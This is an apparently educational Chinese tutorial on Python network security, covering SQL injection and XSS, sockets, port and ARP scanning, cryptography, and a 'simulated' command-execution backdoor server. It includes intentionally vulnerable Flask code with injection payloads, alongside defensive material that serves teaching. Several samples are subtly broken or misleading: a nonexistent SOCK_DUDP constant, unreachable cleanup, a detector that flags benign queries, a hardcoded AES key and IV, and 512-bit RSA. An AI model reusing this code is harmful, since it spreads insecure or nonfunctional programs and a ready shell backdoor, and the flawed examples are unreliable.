MK
摩柯社区 - 一个极简的技术知识社区
AI 面试

Python网络安全基础

2024-06-126.5k 阅读

网络安全基础概念

  1. 网络攻击类型
    • 注入攻击:这是一种常见的攻击方式,攻击者通过将恶意代码插入到应用程序输入字段中,从而获取数据库或其他敏感信息的访问权限。例如SQL注入,在使用Python的Web开发中,如果对用户输入没有进行严格验证,可能会遭受此类攻击。在一个简单的基于Flask框架连接MySQL数据库的示例中,如果代码这样写:
import mysql.connector
from flask import Flask, request

app = Flask(__name__)


@app.route('/query')
def query():
    username = request.args.get('username')
    password = request.args.get('password')
    conn = mysql.connector.connect(user='root', password='password', host='127.0.0.1', database='test')
    cursor = conn.cursor()
    query = "SELECT * FROM users WHERE username = '%s' AND password = '%s'" % (username, password)
    cursor.execute(query)
    result = cursor.fetchall()
    conn.close()
    return str(result)


if __name__ == '__main__':
    app.run(debug=True)

在上述代码中,如果攻击者在浏览器地址栏输入/query?username=admin' OR '1'='1&password=123,由于SQL语句拼接方式,就会执行一个恶意的查询,绕过了密码验证,因为'1'='1'恒成立。 - 跨站脚本攻击(XSS):XSS攻击是指攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页之时,嵌入其中的JavaScript代码会被执行,从而达到恶意攻击用户的目的。例如在一个简单的Python Web应用中,如果对用户输入的评论没有进行安全过滤就直接显示在页面上:

from flask import Flask, request, render_template_string

app = Flask(__name__)


@app.route('/comment', methods=['GET', 'POST'])
def comment():
    if request.method == 'POST':
        comment_text = request.form.get('comment')
        template = """
        <html>
        <body>
        <h1>Comments</h1>
        <p>{{ comment }}</p>
        </body>
        </html>
        """
        return render_template_string(template, comment=comment_text)
    else:
        return """
        <html>
        <body>
        <form method="post">
        <label for="comment">Comment:</label><br>
        <input type="text" id="comment" name="comment"><br>
        <input type="submit" value="Submit">
        </form>
        </body>
        </html>
        """


if __name__ == '__main__':
    app.run(debug=True)

攻击者可以输入<script>alert('XSS')</script>,当其他用户访问该评论页面时,这段恶意脚本就会被执行。 2. 网络安全防御机制 - 输入验证:在Python代码中,对于所有用户输入都应该进行严格验证。以处理整数输入为例,在一个简单的命令行程序中,需要用户输入一个整数:

try:
    num = int(input("请输入一个整数: "))
    print(f"你输入的整数是: {num}")
except ValueError:
    print("输入无效,请输入一个整数。")

在Web开发中,Flask-WTF扩展可以帮助进行表单验证。首先安装flask - wtf库,然后可以这样使用:

from flask import Flask, render_template_string, request
from wtforms import IntegerField, Form
from wtforms.validators import DataRequired

app = Flask(__name__)


class NumberForm(Form):
    number = IntegerField('Number', validators=[DataRequired()])


@app.route('/input_number', methods=['GET', 'POST'])
def input_number():
    form = NumberForm(request.form)
    if request.method == 'POST' and form.validate():
        number = form.number.data
        return f"你输入的有效整数是: {number}"
    template = """
    <html>
    <body>
    <form method="post">
    {{ form.csrf_token }}
    <label for="number">输入一个整数:</label><br>
    {{ form.number }}
    <input type="submit" value="提交">
    </form>
    </body>
    </html>
    """
    return render_template_string(template, form = form)


if __name__ == '__main__':
    app.run(debug=True)
- **安全编码实践**:遵循安全编码规范,例如避免使用不安全的函数。在处理文件操作时,使用`with`语句来确保文件正确关闭,防止资源泄露。
try:
    with open('test.txt', 'r') as f:
        content = f.read()
        print(content)
except FileNotFoundError:
    print("文件未找到")

Python网络编程基础

  1. 套接字(Socket)编程
    • TCP套接字:TCP是一种面向连接的、可靠的传输协议。在Python中,可以使用socket模块来创建TCP套接字。以下是一个简单的TCP服务器和客户端示例。
    • TCP服务器代码
import socket

server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind(('127.0.0.1', 8888))
server_socket.listen(5)
print('服务器正在监听127.0.0.1:8888')

while True:
    client_socket, client_address = server_socket.accept()
    print(f'与{client_address}建立连接')
    data = client_socket.recv(1024)
    print(f'接收到数据: {data.decode()}')
    response = '数据已收到'.encode()
    client_socket.send(response)
    client_socket.close()
- **TCP客户端代码**:
import socket

client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect(('127.0.0.1', 8888))
message = '你好,服务器'.encode()
client_socket.send(message)
data = client_socket.recv(1024)
print(f'从服务器接收到: {data.decode()}')
client_socket.close()
- **UDP套接字**:UDP是一种无连接的、不可靠的传输协议。同样使用`socket`模块来创建UDP套接字。
- **UDP服务器代码**:
import socket

server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_socket.bind(('127.0.0.1', 9999))
print('UDP服务器正在监听127.0.0.1:9999')

while True:
    data, client_address = server_socket.recvfrom(1024)
    print(f'从{client_address}接收到数据: {data.decode()}')
    response = 'UDP数据已收到'.encode()
    server_socket.sendto(response, client_address)
- **UDP客户端代码**:
import socket

client_socket = socket.socket(socket.AF_INET, socket.SOCK_DUDP)
server_address = ('127.0.0.1', 9999)
message = '你好,UDP服务器'.encode()
client_socket.sendto(message, server_address)
data, server_address = client_socket.recvfrom(1024)
print(f'从服务器接收到: {data.decode()}')
client_socket.close()
  1. HTTP协议与Web请求
    • 使用requests库发送HTTP请求requests库是Python中非常流行的用于发送HTTP请求的库。例如,发送一个GET请求获取网页内容:
import requests

response = requests.get('https://www.example.com')
if response.status_code == 200:
    print(response.text)
else:
    print(f'请求失败,状态码: {response.status_code}')

发送POST请求,例如向一个登录接口发送用户名和密码:

import requests

url = 'https://example.com/login'
data = {
    'username': 'user',
    'password': 'pass'
}
response = requests.post(url, data=data)
if response.status_code == 200:
    print('登录成功')
else:
    print(f'登录失败,状态码: {response.status_code}')
- **使用`http.server`模块创建简单HTTP服务器**:`http.server`模块可以用于创建简单的HTTP服务器。以下是一个基本的示例:
import http.server
import socketserver

PORT = 8000


class MyHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content - type', 'text/html')
        self.end_headers()
        self.wfile.write(b'Hello, this is a simple HTTP server')


with socketserver.TCPServer(("", PORT), MyHandler) as httpd:
    print(f'Serving at port {PORT}')
    httpd.serve_forever()

Python与网络扫描

  1. 端口扫描
    • 使用socket模块进行简单端口扫描:可以编写一个脚本来扫描指定主机的特定端口是否开放。
import socket


def port_scan(host, port):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(1)
        result = sock.connect_ex((host, port))
        if result == 0:
            print(f'端口 {port} 开放')
        else:
            print(f'端口 {port} 关闭')
        sock.close()
    except socket.error:
        print(f'无法连接到 {host}:{port}')


host = '127.0.0.1'
ports = [22, 80, 443]
for port in ports:
    port_scan(host, port)
- **使用`nmap`模块进行更强大的端口扫描**:`nmap`模块是Python对著名的Nmap网络扫描工具的封装。首先需要安装`python - nmap`库。以下是一个示例:
import nmap

nm = nmap.PortScanner()
nm.scan('127.0.0.1', '1 - 1024')
for host in nm.all_hosts():
    print(f'主机 : {host}')
    print(f'状态 : {nm[host].state()}')
    for proto in nm[host].all_protocols():
        print(f'协议 : {proto}')
        lport = nm[host][proto].keys()
        for port in lport:
            print(f'端口 : {port}\t状态 : {nm[host][proto][port]["state"]}')
  1. 网络发现
    • 使用ARP协议进行局域网内主机发现:可以使用scapy库来实现基于ARP协议的局域网主机发现。首先安装scapy库。
from scapy.all import ARP, Ether, srp

ip_range = '192.168.1.0/24'
arp = ARP(pdst=ip_range)
ether = Ether(dst='ff:ff:ff:ff:ff:ff')
packet = ether / arp
result = srp(packet, timeout = 3, verbose = 0)[0]

clients = []
for sent, received in result:
    clients.append({'ip': received.psrc,'mac': received.hwsrc})

for client in clients:
    print(f"IP: {client['ip']}\tMAC: {client['mac']}")

Python与Web安全

  1. Web应用漏洞检测
    • SQL注入检测:可以编写一个简单的函数来检测SQL注入风险。对于一个SQL查询字符串,检查是否存在常见的SQL注入关键字。
def detect_sql_injection(query):
    keywords = ['OR', 'AND', ';', '--', 'DELETE', 'DROP', 'TRUNCATE']
    for keyword in keywords:
        if keyword.lower() in query.lower():
            return True
    return False


query1 = "SELECT * FROM users WHERE username = 'admin' AND password = '123'"
query2 = "SELECT * FROM users WHERE username = 'admin' OR '1'='1'"
print(detect_sql_injection(query1))
print(detect_sql_injection(query2))
- **XSS漏洞检测**:检测用户输入中是否存在HTML或JavaScript标签。
import re


def detect_xss(input_str):
    pattern = re.compile(r'<(.*?)>')
    if pattern.search(input_str):
        return True
    return False


input1 = "这是一个正常的评论"
input2 = "<script>alert('XSS')</script>"
print(detect_xss(input1))
print(detect_xss(input2))
  1. Web应用安全加固
    • 防止SQL注入:在使用数据库时,使用参数化查询。以sqlite3为例:
import sqlite3

conn = sqlite3.connect('test.db')
cursor = conn.cursor()
username = 'admin'
password = '123'
query = "SELECT * FROM users WHERE username =? AND password =?"
cursor.execute(query, (username, password))
result = cursor.fetchall()
conn.close()
- **防止XSS**:在Web应用中,对用户输入进行HTML转义。在Flask框架中,可以使用`MarkupSafe`库中的`escape`函数:
from flask import Flask, render_template_string, request
from markupsafe import escape

app = Flask(__name__)


@app.route('/safe_comment', methods=['GET', 'POST'])
def safe_comment():
    if request.method == 'POST':
        comment_text = request.form.get('comment')
        safe_comment = escape(comment_text)
        template = """
        <html>
        <body>
        <h1>Comments</h1>
        <p>{{ comment }}</p>
        </body>
        </html>
        """
        return render_template_string(template, comment = safe_comment)
    else:
        return """
        <html>
        <body>
        <form method="post">
        <label for="comment">Comment:</label><br>
        <input type="text" id="comment" name="comment"><br>
        <input type="submit" value="Submit">
        </form>
        </body>
        </html>
        """


if __name__ == '__main__':
    app.run(debug=True)

Python与密码学

  1. 对称加密
    • 使用pycryptodome库进行AES加密:AES(高级加密标准)是一种常用的对称加密算法。首先安装pycryptodome库。
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import binascii

key = b'1234567890123456'
iv = b'1234567890123456'
plaintext = b'这是一段需要加密的文本'

cipher = AES.new(key, AES.MODE_CBC, iv)
padded_plaintext = pad(plaintext, AES.block_size)
ciphertext = cipher.encrypt(padded_plaintext)
print(binascii.hexlify(ciphertext))

cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted_padded = cipher.decrypt(ciphertext)
decrypted = unpad(decrypted_padded, AES.block_size)
print(decrypted.decode())
  1. 非对称加密
    • 使用rsa库进行RSA加密:RSA是一种广泛使用的非对称加密算法。安装rsa库后,以下是示例代码:
import rsa

# 生成密钥对
(pubkey, privkey) = rsa.newkeys(512)

message = '这是需要加密的消息'.encode()
# 加密
crypto = rsa.encrypt(message, pubkey)
print(crypto)
# 解密
decrypt = rsa.decrypt(crypto, privkey)
print(decrypt.decode())
  1. 哈希函数
    • 使用hashlib库进行MD5和SHA - 256哈希计算
import hashlib

data = '这是需要计算哈希值的数据'.encode()

md5_hash = hashlib.md5(data)
print('MD5哈希值:', md5_hash.hexdigest())

sha256_hash = hashlib.sha256(data)
print('SHA - 256哈希值:', sha256_hash.hexdigest())

Python与恶意软件分析

  1. 恶意软件行为模拟
    • 模拟简单的后门程序:以下代码模拟了一个简单的后门程序,在特定条件下执行系统命令。
import socket
import subprocess

server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind(('127.0.0.1', 12345))
server_socket.listen(1)

while True:
    client_socket, client_address = server_socket.accept()
    command = client_socket.recv(1024).decode()
    if command:
        try:
            result = subprocess.check_output(command, shell=True)
            client_socket.send(result)
        except subprocess.CalledProcessError as e:
            client_socket.send(str(e).encode())
    client_socket.close()
  1. 恶意软件检测
    • 检测进程是否为恶意进程:可以通过监控进程的行为,例如CPU和内存使用情况,结合已知的恶意进程特征来判断。以下是一个简单示例,监控进程名称是否为已知恶意进程名称。
import psutil


def detect_malicious_process():
    malicious_process_names = ['malware.exe', 'virus.exe']
    for proc in psutil.process_iter(['name']):
        if proc.info['name'] in malicious_process_names:
            print(f'检测到恶意进程: {proc.info["name"]}')


detect_malicious_process()

Python与网络安全自动化

  1. 安全任务自动化脚本
    • 定期进行端口扫描并记录结果:可以编写一个脚本,定期对指定主机进行端口扫描,并将结果记录到文件中。
import socket
import time


def port_scan(host, port):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(1)
        result = sock.connect_ex((host, port))
        if result == 0:
            return True
        else:
            return False
        sock.close()
    except socket.error:
        return False


host = '127.0.0.1'
ports = [22, 80, 443]

while True:
    with open('port_scan_results.txt', 'a') as f:
        f.write(f'扫描时间: {time.ctime()}\n')
        for port in ports:
            if port_scan(host, port):
                f.write(f'端口 {port} 开放\n')
            else:
                f.write(f'端口 {port} 关闭\n')
        f.write('\n')
    time.sleep(3600)  # 每小时扫描一次
  1. 安全配置自动化
    • 使用paramiko库自动化配置远程服务器paramiko库可以实现通过SSH协议远程连接服务器并执行命令。例如,远程修改服务器的防火墙规则。
import paramiko

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('remote_server_ip', username='user', password='pass')

command = 'iptables -A INPUT -p tcp --dport 80 -j ACCEPT'
stdin, stdout, stderr = ssh.exec_command(command)
if stderr.read():
    print(f'执行命令出错: {stderr.read().decode()}')
else:
    print('命令执行成功')

ssh.close()